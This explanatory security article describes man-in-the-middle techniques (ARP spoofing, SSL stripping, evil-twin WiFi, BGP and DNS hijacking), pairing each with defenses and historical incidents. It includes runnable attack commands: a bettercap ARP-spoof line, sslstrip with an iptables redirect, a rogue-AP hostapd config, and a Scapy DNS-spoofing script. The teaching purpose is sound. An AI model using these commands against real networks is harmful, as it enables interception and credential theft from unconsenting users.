Man-in-the-middle (MITM) attacks position an attacker between two communicating parties, allowing them to intercept, read, or modify traffic. Unlike active exploits, MITM often starts passively — observing traffic before deciding whether to intercept or modify. Here’s how MITM works in practice across different scenarios.
ARP Spoofing (Local Network)
ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on local networks. It’s stateless and unauthenticated — anyone can claim any IP.
How It Works
# On attacker machine (Kali Linux / Bettercap)
# Send gratuitous ARP replies claiming to be the gateway
bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.105; arp.spoof on; net.probe on"
- Attacker sends ARP replies claiming their MAC address is the gateway’s IP (192.168.1.1)
- Victim’s ARP table is updated — victim now sends all traffic to attacker instead of gateway
- Attacker forwards traffic to the real gateway (transparent relay)
- All victim traffic passes through attacker’s machine
With ARP spoofing in place, the attacker can:
- Capture credentials from unencrypted protocols (HTTP, FTP, SMTP without TLS)
- SSL strip attacks (downgrade HTTPS to HTTP)
- Inject content into HTTP responses
- Capture cookies from unencrypted sessions
Defense:
- Dynamic ARP Inspection (DAI): enterprise switches validate ARP packets against a DHCP snooping binding table
- VPN: encrypt all traffic — ARP spoofing still intercepts packets but can’t decrypt them
- HTTPS Everywhere + HSTS: HSTS prevents SSL stripping for known sites
- Static ARP entries for gateway:
arp -s 192.168.1.1 AA:BB:CC:DD:EE:FF
SSL Stripping
SSL stripping downgrades HTTPS connections to HTTP:
- Victim requests
http://bank.com(initial HTTP request) - Server redirects to
https://bank.com - MITM intercepts the redirect — fetches HTTPS from the server but serves HTTP to victim
- Victim sees the site over HTTP; attacker sees all traffic in plaintext
- The URL bar shows
http://bank.com— users often don’t notice
# SSLStrip (classic tool)
sslstrip -l 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Defense:
- HSTS (HTTP Strict Transport Security): server tells browser to always use HTTPS
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload - HSTS Preloading: browser has a hardcoded list of HSTS domains — never uses HTTP regardless of what MITM serves
- Visit only HTTPS URLs: type
https://explicitly; browser extensions force HTTPS
Rogue WiFi Access Points (Evil Twin)
A rogue access point mimics a legitimate network to intercept traffic.
Attack Setup
# Create a rogue AP with same SSID as target
# Using hostapd + bettercap or airbase-ng
# hostapd config
cat > /tmp/hostapd.conf << EOF
interface=wlan0mon
driver=nl80211
ssid=CoffeeShop_WiFi # Same as legitimate AP
channel=6
hw_mode=g
EOF
hostapd /tmp/hostapd.conf
The rogue AP sends stronger signal than the legitimate one, causing devices to deauthenticate and connect to the attacker.
Real-world variant: captive portal evil twin — the rogue AP shows a fake “connect to WiFi” page that steals credentials or installs malware before granting internet access.
Defense:
- VPN: all traffic encrypted regardless of which WiFi you’re on
- Don’t trust WiFi networks without a VPN on untrusted networks
- 802.1X authentication (WPA2/3-Enterprise): each user has unique credentials, rogue APs can’t easily replicate
- Be suspicious of duplicate SSID networks — check signal source with WiFi Analyzer
BGP Hijacking (Internet-Scale)
Border Gateway Protocol (BGP) routes traffic between autonomous systems (ISPs, cloud providers). BGP trusts that networks only advertise their own IP ranges — there’s no cryptographic verification.
A BGP hijack occurs when a network (maliciously or misconfigured) announces another network’s IP prefix:
- Attacker’s AS announces
203.0.113.0/24(a prefix they don’t own) - Some routers accept the announcement (shortest path or misconfiguration)
- Traffic destined for
203.0.113.xroutes to attacker’s network - Attacker can read, modify, or drop the traffic before forwarding
Historical examples:
- 2010: Pakistan Telecom’s misconfiguration hijacked YouTube’s traffic globally for 18 minutes
- 2018: BGP hijack redirected Amazon Route 53 DNS traffic for 2 hours, used to steal $150,000 in cryptocurrency (MyEtherWallet users)
- 2019: BGP route leak from small ISP rerouted Google’s traffic through China Telecom
Defense:
- RPKI (Resource Public Key Infrastructure): cryptographically validates BGP announcements; operators with RPKI ROAs can reject invalid route announcements
- BGP route filtering: ISPs filter routes from customers to only allow their legitimate prefixes
- HTTPS + certificate pinning: even if BGP routes traffic to attacker, valid TLS certificate is required
- Limited without ISP/carrier cooperation
DNS Hijacking
Modify DNS responses to redirect users to attacker-controlled servers:
Methods:
- Compromise home router’s DNS settings (change to rogue DNS server)
- On-path attack: intercept DNS queries and return forged responses
- Compromise authoritative DNS server or registrar account
# Intercept and modify DNS with Scapy (conceptual)
from scapy.all import *
def dns_spoof(pkt):
if pkt.haslayer(DNS) and pkt[DNS].qr == 0: # DNS query
if 'bank.com' in pkt[DNS].qd.qname.decode():
# Send forged response
spoofed = IP(dst=pkt[IP].src) / UDP(dport=pkt[UDP].sport) / \
DNS(id=pkt[DNS].id, qr=1, aa=1,
an=DNSRR(rrname=pkt[DNS].qd.qname, rdata='attacker.ip'))
send(spoofed)
sniff(filter="udp port 53", prn=dns_spoof)
Defense:
- DNSSEC: cryptographically signs DNS records — forged responses fail signature verification
- DNS over HTTPS (DoH) / DNS over TLS (DoT): encrypts DNS queries, prevents on-path interception
- HTTPS + certificate transparency: even with DNS hijacked, the attacker can’t get a valid TLS certificate for the victim’s domain (without compromising a CA)
- Lock down router DNS settings with a strong admin password; use DoH upstream resolvers
MITM attacks exploit trust assumptions built into network protocols designed in an era when the internet was a cooperative research network. Modern defenses layer cryptography (TLS, DNSSEC, RPKI) on top of those protocols to add the authentication that was originally missing.